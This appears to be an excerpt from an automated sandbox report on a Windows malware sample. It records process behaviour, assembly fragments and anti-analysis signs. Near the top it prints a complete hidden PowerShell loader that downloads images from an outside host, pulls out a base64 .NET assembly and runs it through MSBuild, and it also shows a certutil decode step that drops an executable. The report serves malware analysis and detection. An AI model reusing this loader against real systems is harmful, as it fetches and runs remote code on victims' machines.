uDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.fg/ecarg/pohs.monocnaf//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD348A00BD pushad ; iretd	3_2_00007FFD348A00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD348A0988 push E95B64D0h; ret	3_2_00007FFD348A09C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0041A041 push esp; retf	10_2_0041A044
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00405047 push esi; retf	10_2_00405065
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0040C8F3 pushad ; iretd	10_2_0040C8F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_004051F8 pushfd ; iretd	10_2_00405202
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00414223 push edi; ret	10_2_004142C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00417A39 push edx; retf	10_2_00417A75
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00414282 push edi; ret	10_2_004142C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0040839B push 0000002Ch; iretd	10_2_004083A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_004174C6 push esi; iretd	10_2_004174E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00417CEC push eax; retf	10_2_00417CFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00417D60 push ebx; ret	10_2_00417D69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0040C645 push ebp; iretd	10_2_0040C64F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00403650 push eax; ret	10_2_00403652
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00415743 push esi; retf	10_2_0041574E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF09AD push ecx; mov dword ptr [esp], ecx	10_2_00FF09B6
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 12_2_034D7300 pushad ; iretd	12_2_034D7301
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 12_2_034E4A4E push esp; retf	12_2_034E4A51
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 12_2_034CFA54 push esi; retf	12_2_034CFA72
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 12_2_034E0150 push esi; retf	12_2_034E015B
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 12_2_034D7052 push ebp; iretd	12_2_034D705C
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 12_2_034E276D push ebx; ret	12_2_034E2776
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 12_2_034E26F9 push eax; retf	12_2_034E2709
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 12_2_034D2DA8 push 0000002Ch; iretd	12_2_034D2DB6
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 12_2_034E2446 push edx; retf	12_2_034E2482
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 12_2_034CFC05 pushfd ; iretd	12_2_034CFC0F
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 12_2_034E0C92 push edi; iretd	12_2_034E0C93
Source: C:\Windows\SysWOW64\SyncHost.exe	Code function: 13_2_046109AD push ecx; mov dword ptr [esp], ecx	13_2_046109B6
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 17_2_05669DD9 push ss; retf	17_2_05669DDA
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 17_2_0566DCB3 push ebp; iretd	17_2_0566DCBD

Hooking and other Techniques for Hiding and Protection

Uses certutil -decode

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\certutil.exe "C:\Windows\System32\certutil.exe" -decode "" "C:\Users\user\AppData\Local\DesktopPic\WallP.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\certutil.exe "C:\Windows\System32\certutil.exe" -decode "" "C:\Users\user\AppData\Local\DesktopPic\WallP.exe"			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 10_2_0106D1C0 rdtsc

10_2_0106D1C0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2005	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 798	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4172	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5651	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API coverage: 0.8 %
Source: C:\Windows\SysWOW64\SyncHost.exe	API coverage: 1.7 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6284	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5772	Thread sleep count: 4172 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5772	Thread sleep count: 5651 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6032	Thread sleep time: -15679732462653109s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe TID: 2812	Thread sleep time: -70000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\SyncHost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: -2-2FfKI.13.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
